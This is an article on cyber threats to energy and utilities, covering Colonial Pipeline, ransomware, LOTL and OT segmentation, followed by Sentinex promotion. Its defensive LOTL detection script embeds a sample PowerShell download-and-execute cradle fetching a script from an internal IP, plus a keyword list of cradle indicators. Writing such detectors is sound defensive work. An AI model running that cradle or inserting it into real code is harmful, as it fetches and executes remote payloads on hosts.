Fuel, Flow, and Firewall: Securing the Digital Backbone of Energy and Utilities

The energy and utilities sector is a multi-faceted mix of oil, natural gas, renewables, and electricity. The systems needed to generate, move, and govern these essential national services form critical infrastructure (CI). As a fundamental part of a functioning society, energy and power networks offer a tempting target for cybercriminals intent on causing widespread power outages, data exposure, and financial losses.
Check Point Research highlighted the surging threat to critical infrastructure assets, identifying a 70% increase in attacks on U.S. utilities. Cybercriminals will increasingly exploit energy and utilities to cause damage, steal intellectual property (IP) and other data, and extort money. As the industry continues to integrate operational technology with information technology (IT/OT), these threats become an ever-present danger.
Protecting Critical Infrastructures: Colonial Pipeline Case Study
In early May 2021, U.S. pipeline operator Colonial Pipeline became the victim of a major ransomware attack by the DarkSide ransomware group. The company carries around 45% of the fuel consumed on the U.S. East Coast. The attackers stole over 100 gigabytes of data, and the company shut down its 5,500 miles of pipeline as a precaution. Over 1,000 gas stations ran out of fuel. To restore operations quickly, Colonial paid the ransom: 75 bitcoin, worth around $4.4 million at the time.
An archived press release from the company stated:
"In response (to the attack), we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations and affected some of our IT systems."
The investigation traced initial access to a legacy VPN account whose password had been compromised. Notably, the VPN did not enforce multi-factor authentication (MFA), so the password alone was enough to get in.
Joseph Blount, President and CEO of Colonial Pipeline Company, testified to the U.S. Congress on 8 June 2021 and explained the critical point of the attack: "We believe the attacker exploited a legacy VPN profile that was not intended to be in use."
Thanks to an FBI investigation, 63.7 of the 75 bitcoin paid to DarkSide, worth about $2.3 million at the time of seizure, were recovered. However, the damage to the company's reputation and customers resulted in class actions by affected fuel retailers. The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) proposed nearly $1 million in civil penalties for noncompliance with pipeline safety regulations.
Top Cybersecurity Threats to Energy and Utilities
KnowBe4 highlights the volume of threats against energy and utility firms, identifying 420 million attacks on critical infrastructure companies, equating to 13 attacks per second. Threats are so high that KnowBe4 describes critical infrastructure as being "under siege".
These findings are reflected in Check Point Research data, showing the extent of attacks affecting CI companies:
[Chart: Average Weekly Cyber Attacks Per Organization in U.S. Source: Check Point Research]
Renewables compound the problem by increasing the attack surface. The FBI warned that residential generation feeding the grid adds new attack points and weaknesses. The warning states that "a cyberattack against a solar panel system, residential or commercial, would likely focus on targeting the system's operational technology (OT) software and hardware; specifically, malicious cyber actors could attempt to gain control over a solar panel system through the inverters".
Energy and utility firms increasingly rely on Internet of Things (IoT) devices and Industrial Control Systems (ICS). These points of connectivity open doors for cybercriminals intent on damage and extortion. Attacks take many forms and include the following techniques and tactics:
Smart Infrastructure Vulnerabilities
Smart infrastructure vulnerabilities offer cybercriminals exploitation points. Advanced metering infrastructure (AMI), such as the smart meters deployed by utilities, extends the attack surface onto customers' premises. An academic paper from Purdue University researchers explores the AMI attack surface. The researchers give an example of how an AMI cyberattack may use intelligence gathering to identify vulnerable targets for malware infection, exfiltrate data from various attack points, and capture control of the system.
The North American Electric Reliability Corporation (NERC) has identified several weak spots in electrical networks and reports that the number of vulnerable points is growing year over year.
Unpatched ICS Vulnerabilities
Hackers exploit vulnerabilities in Industrial Control Systems (ICS) to gain unauthorized access. The U.S. cyber defense agency, CISA, regularly publishes warnings on security issues and vulnerabilities affecting ICS.
Supply Chain Attacks
Energy and utilities are vulnerable to supply chain attacks, according to analysis by KPMG and SecurityScorecard. The study shows that 45% of security breaches in the energy sector were due to third-party vulnerabilities.
The SolarWinds breach shows how one supply chain compromise can reach many energy companies at once. The backdoored update to the SolarWinds Orion monitoring platform reached roughly a quarter of the electric utilities on the North American power grid.
Ransomware
Ransomware gangs like DarkSide target critical infrastructure suppliers for extortion and, at times, for geopolitical reasons. The ransomware problem in energy and utilities is severe, with a CI threat report from Sophos finding that 67% of respondents said their organizations had suffered a ransomware attack. The mean cost to energy, oil/gas, and utilities organizations to recover from a ransomware attack is $3.12 M. Initial access is typically gained through a spear-phishing email, often combined with MFA bypass techniques such as push fatigue or adversary-in-the-middle phishing to defeat weaker second factors.
Halliburton, a U.S. oilfield services company, was the victim of a ransomware attack in 2024. The RansomHub gang exfiltrated a large volume of data and posted it on its dark web leak site as leverage for a ransom payment. Halliburton put breach-related losses at around $35 million.
Living-Off-The-Land (LOTL)
LOTL is a technique in which attackers use legitimate, built-in administrative tools, like PowerShell and PsExec, instead of custom malware. Initial access is usually via a phishing email. Because these tools are trusted and present on every host, their use rarely trips signature-based monitoring. Attackers then move laterally within the OT network and escalate privileges, again using legitimate network tools. Once they hold enough privileges, they can run scripts that alter programmable logic controller (PLC) settings within industrial environments to manipulate critical processes. Russia-linked hacking group Sandworm used LOTL techniques to attack a Ukrainian critical infrastructure organization.
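Because LOTL activity uses tools that are already on the box, detection has to look at how they are invoked rather than at what binary runs. The script below is an added example, not code from the article or from any vendor it names; it runs two such checks over a few constructed Windows event records (Security 4688 / Sysmon 1 process creation and System 7045 service installation) in a simplified dict shape. The indicator strings, host names and addresses are assumptions chosen for illustration.

```python
"""Living-off-the-land (LOTL) indicators over sample Windows event records.

Added example, not code from the article or any vendor it mentions.
Input is a handful of constructed event records in a simplified dict shape
(EventID plus a few named fields) that mirrors what a SIEM export of the
Security/System logs or Sysmon would carry. Two common LOTL patterns are checked:

  * EventID 4688 (Security) / 1 (Sysmon): PowerShell started with an
    -EncodedCommand argument. The base64 is decoded (PowerShell encodes the
    script as UTF-16LE) and inspected for download/execute cradles.
  * EventID 7045 (System): a new service installed whose name or image is
    PSEXESVC, the service PsExec drops on the remote host.

The indicator strings are assumptions chosen for illustration; tune them to
your environment's approved automation before alerting on them.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass
class Finding:
    event_index: int
    rule: str
    detail: str


# PowerShell accepts any unambiguous prefix of -EncodedCommand; these four are
# the forms seen in practice. Case-insensitive, as PowerShell itself is.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings typical of download-and-execute cradles and defence evasion.
SUSPICIOUS_PS = ("DownloadString", "IEX", "Invoke-Expression", "Net.WebClient",
                 "Invoke-WebRequest", "FromBase64String", "-w hidden")


def encode_ps(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script from an -EncodedCommand argument, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed payload: not PowerShell-style encoding


def analyze(events):
    """Return a Finding for every event that matches one of the LOTL rules."""
    findings = []
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid in (4688, 1):
            image = ev.get("Image", "").lower()
            if image.endswith(("powershell.exe", "pwsh.exe")):
                decoded = decode_encoded_command(ev.get("CommandLine", ""))
                if decoded is not None:
                    hits = [s for s in SUSPICIOUS_PS if s.lower() in decoded.lower()]
                    rule = "encoded_powershell_cradle" if hits else "encoded_powershell"
                    findings.append(Finding(i, rule, f"{decoded.strip()!r} hits={hits}"))
        elif eid == 7045:
            name = ev.get("ServiceName", "")
            path = ev.get("ImagePath", "")
            if name.upper() == "PSEXESVC" or "psexesvc" in path.lower():
                findings.append(Finding(i, "psexec_service_install", f"{name} -> {path}"))
    return findings


# Constructed sample records: one encoded download cradle on an engineering
# workstation, one PsExec service drop on an HMI, and two benign events.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Host": "ENG-WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.10.5.7/stage.ps1')")},
    {"EventID": 7045, "Host": "HMI-02", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4688, "Host": "ENG-WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"EventID": 7045, "Host": "HMI-02", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event[{f.event_index}] {f.rule}: {f.detail}")
```

The two rules fire on the first two records and stay quiet on the scheduled backup script and the legitimate spooler service. In an OT environment, a PSEXESVC install on an HMI or an encoded PowerShell launch on an engineering workstation is rare enough to be worth an alert on its own, even before the decoded script is inspected.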
Why Are Energy and Utilities Firms Targeted?
The connected OT ecosystem is a core focus for attackers. Networks connected to Supervisory Control and Data Acquisition (SCADA) systems are incredibly tempting for threat actors. The convergence of OT/IT provides an exploitable surface where cybercriminals can gain unauthorized access and control. The most common motives for attacking energy and utilities organizations are the following:
Political attacks and cyber espionage
Global tensions are mounting, leading to state-sponsored threat actors' attacks on CI (critical infrastructure). The Microsoft Digital Defense Report found increased reports of attacks on internet-exposed, poorly secured OT devices that control real-world critical processes. The causes were unpatched components and default passwords. The U.S. NERC warns that "geopolitical conflict, including Russia's invasion of Ukraine and the war in Gaza, has dramatically increased the number of threats to North American power grids".
In the USA, for example, internet-exposed OT equipment in water and wastewater systems has been targeted in multiple attacks by pro-Russian threat actors.
Financial exploitation
Cybercriminals weaponize critical infrastructures to extort large ransoms. Resecurity researchers have described how this tactic is driving ransomware operators targeting energy firms to increase their extortion demands beyond $7 million.
Data
Energy and utilities hold valuable data, including customer and company-sensitive information. The Thales Data Threat report found that 42% of critical infrastructure companies, including those in the energy sector, suffered data breaches.
AI in Energy and Utilities
The blooming AI landscape brings cybersecurity benefits to the energy sector, but AI is also being used for adversarial purposes. A recent report from the U.S. Department of Energy examines the benefits and risks of AI within critical infrastructure. It points out that while AI and machine learning can be used for benefits such as optimizing controls and predictive maintenance, AI can also be turned to adversarial attacks. The report describes various AI-enabled attacks, including data extraction, AI supply chain attacks, and autonomous malware.
Read more on the adversarial potential of AI on critical infrastructures: "Potential Benefits and Risks of Artificial Intelligence for Critical Energy Infrastructure".
Cybersecurity Regulatory Compliance and Guidance for Energy and Utilities

Federal and industry regulations and standards cover the energy and utilities sector. Some examples include the following:
- NIST Cybersecurity Framework: Cybersecurity Framework | NIST
- Sector-specific standards: for example, NERC CIP covers the electricity subsector, and the U.S. Environmental Protection Agency (EPA) offers cybersecurity guidance for water suppliers
- Department of Energy (DOE) Office of Cybersecurity, Energy Security, & Emergency Response (CESER): see the draft Interim Implementation Guidance to assist utilities in adopting the Cybersecurity Baselines
- Energy Modernization Cybersecurity Implementation Plan (EMCIP): the plan details 32 high-impact initiatives that, when implemented, help to achieve a more secure energy ecosystem
Search for federal energy laws using the Department of Energy's searchable database.
Mitigating Cybersecurity Risks: Best Practices
The energy and utilities sector requires a defense-in-depth approach to tackling increasing attacks targeting critical infrastructures:
Robust Identity Management
Unauthorized access to OT/IT resources is behind many cyberattacks on the sector. To mitigate identity-focused attacks, enforce the principle of least privilege (PoLP) so that access is granted on a need-to-know basis. Just-in-Time (JIT) access limits privileges to the window in which they are needed. Add phishing-resistant MFA (for example, FIDO2 hardware keys or certificate-based authentication) to defeat multi-factor authentication bypass tactics. Use Privileged Access Management (PAM) from vendors like One Identity to manage access privileges.
Train Your Team
Security awareness training is essential to cybersecurity preparedness. Educating staff and associates on the tactics used by cybercriminals to manipulate behavior and on security hygiene issues like safe password use helps to create a culture of security. Vendors like TitanHQ specialize in behavior-led security awareness training.
Network Segmentation
By segmenting an OT network into zones, with controlled conduits between them, a critical infrastructure organization can isolate areas and contain the spread of a cyberattack.
Update Software
Ensure that software and firmware are patched and up to date to prevent vulnerability exploitation. Always change default passwords on IoT devices to something unique and strong, and use MFA where possible.
Dark Web Monitoring
Services like Sentinex help enable an energy and utilities organization to identify threats lurking on the dark web. This includes locating potentially stolen company and customer data and potential threats to the organization.
Get Cyber Insurance
Cyber insurance can help with costs after a cyberattack. Insurance may cover losses associated with failure to supply, fines, noncompliance outcomes, enforced shutdowns, property damage, etc. Some cyber insurers, like Canopius, offer specialist coverage for utilities.
Monitor and Detect
Intrusion detection system (IDS) tools monitor network traffic in real time, looking for unusual or anomalous activity that may signal a cyberattack. Monitoring tools for IoT and OT networks help identify anomalous patterns, including across external remote connections, that could signal a cyberattack. Firewalls placed at zone boundaries within an OT network control traffic between zones and help prevent unauthorized access to critical assets; protocol-aware industrial firewalls can additionally restrict which Modbus or DNP3 function codes are allowed to cross a boundary.
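Segmentation (above, under Network Segmentation) and monitoring meet in one question: does every observed flow match a conduit the zone model explicitly allows? The script below is an added example, not code from the article or any product it mentions. It defines a small, constructed address plan and conduit table for a utility network, parses constructed flow-log lines, and reports every flow that crosses a zone boundary without a matching conduit or involves an address outside every zone.

```python
"""Zone-and-conduit audit of flow records across an IT/OT boundary.

Added example, not code from the article. The zones, the allowed conduits and
the flow records below are constructed assumptions for a small utility
network; replace them with your own address plan and approved data paths.
Anything crossing a zone boundary without an explicit conduit is reported as
a violation, as is any flow involving an address that belongs to no defined
zone (e.g. an internet source reaching straight into SCADA). Traffic that
stays inside one zone is not inspected here.
"""
import ipaddress
import re
from dataclasses import dataclass

# Assumed address plan (constructed).
ZONES = {
    "corp_it":  ipaddress.ip_network("10.1.0.0/16"),      # business workstations/servers
    "dmz":      ipaddress.ip_network("10.2.0.0/24"),      # jump host, historian replica
    "ot_scada": ipaddress.ip_network("192.168.10.0/24"),  # SCADA servers, engineering WS
    "ot_field": ipaddress.ip_network("192.168.20.0/24"),  # PLCs and RTUs
}

# Allowed conduits as (src_zone, dst_zone, proto, dst_port). Business IT only
# reaches OT through the DMZ; only SCADA hosts may talk to field devices.
CONDUITS = {
    ("corp_it",  "dmz",      "tcp", 443),    # browse historian replica
    ("corp_it",  "dmz",      "tcp", 3389),   # RDP to jump host
    ("dmz",      "ot_scada", "tcp", 3389),   # jump host to engineering WS
    ("ot_scada", "dmz",      "tcp", 5432),   # historian pushes data outward
    ("ot_scada", "ot_field", "tcp", 502),    # Modbus/TCP polling
    ("ot_scada", "ot_field", "tcp", 20000),  # DNP3
}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dport: int


# Constructed flow-log line format: "<timestamp> <src>:<sport> -> <dst>:<dport> <proto>"
FLOW_LINE = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)\s+(\w+)$")


def parse_flow(line):
    m = FLOW_LINE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable flow record: {line!r}")
    _ts, src, _sport, dst, dport, proto = m.groups()
    return Flow(src, dst, proto.lower(), int(dport))


def zone_of(ip):
    """Name of the zone containing ip, or None if it belongs to no zone."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None


def check_flow(flow):
    """Return (verdict, reason); verdict is 'allow' or 'violation'."""
    s, d = zone_of(flow.src), zone_of(flow.dst)
    if s is None or d is None:
        bad = flow.src if s is None else flow.dst
        return "violation", f"address {bad} is outside every defined zone"
    if s == d:
        return "allow", f"intra-zone traffic within {s}"
    if (s, d, flow.proto, flow.dport) in CONDUITS:
        return "allow", f"conduit {s}->{d} {flow.dport}/{flow.proto}"
    return "violation", f"no conduit {s}->{d} {flow.dport}/{flow.proto}"


def violations(lines):
    """Parse flow-log lines and return (flow, reason) for each policy violation."""
    out = []
    for line in lines:
        flow = parse_flow(line)
        verdict, reason = check_flow(flow)
        if verdict == "violation":
            out.append((flow, reason))
    return out


# Constructed sample flow log.
SAMPLE_FLOWS = [
    "2024-05-01T10:00:01Z 10.1.20.5:51234 -> 10.2.0.10:3389 tcp",        # IT -> jump host: allowed
    "2024-05-01T10:00:07Z 10.2.0.10:49877 -> 192.168.10.3:3389 tcp",     # jump host -> eng WS: allowed
    "2024-05-01T10:00:12Z 192.168.10.3:40021 -> 192.168.20.11:502 tcp",  # SCADA -> PLC Modbus: allowed
    "2024-05-01T10:00:15Z 192.168.20.11:502 -> 192.168.20.12:502 tcp",   # intra-field: not inspected
    "2024-05-01T10:01:02Z 10.1.20.5:51240 -> 192.168.20.11:502 tcp",     # IT host polling a PLC directly
    "2024-05-01T10:01:30Z 10.2.0.10:49890 -> 192.168.20.11:44818 tcp",   # jump host -> PLC EtherNet/IP
    "2024-05-01T10:02:11Z 203.0.113.7:55555 -> 192.168.10.3:22 tcp",     # internet source into SCADA
]


if __name__ == "__main__":
    for flow, reason in violations(SAMPLE_FLOWS):
        print(f"VIOLATION {flow.src} -> {flow.dst}:{flow.dport}/{flow.proto}: {reason}")
```

The same conduit table that drives this audit is what the boundary firewalls should be configured from, so a violation in the flow log means either the firewall rules have drifted from the documented zone model or traffic is bypassing the boundary altogether (a dual-homed host, an unmanaged switch, a forgotten modem). Both findings are worth an investigation rather than a rule tweak.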
Review the Security Posture of Connected Third-Party Suppliers
Supply chain attacks are used to exploit critical infrastructure organizations. Put robust supply chain risk management processes in place, checking the security posture of each vendor.
Create a Response and Recovery Plan
If the worst-case scenario does occur, having a well-thought-out response and recovery plan can help mitigate the attack. A response plan is a written document that outlines the steps to contain and mitigate the attack. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) offers some guidelines for creating an effective plan.
CISA has also created the Crisis Event Response and Recovery Access (CERRA) Framework to help CI organizations in developing a robust response plan that involves external authorities.
The Dark Web and Energy and Utilities

Initial access brokers (IABs) and ransomware actors use dark web forums and groups to discuss methods to compromise industrial systems. Cybercriminals use the dark web to share intelligence on exposed SCADA systems or zero-day vulnerabilities to exploit IoT devices and OT networks.
A small advisory firm recently used Sentinex dark web monitoring tools to flag a leak of 2,000 data records. The tools identified the exposed data within hours. The company used Sentinex to lock the data from further exposure, helping it avoid a $400K loss. Sentinex helps secure data further by providing encrypted file sharing and real-time threat alerts; read more on the company's FAQ. Sentinex provides proactive cybersecurity, stopping threats from becoming incidents.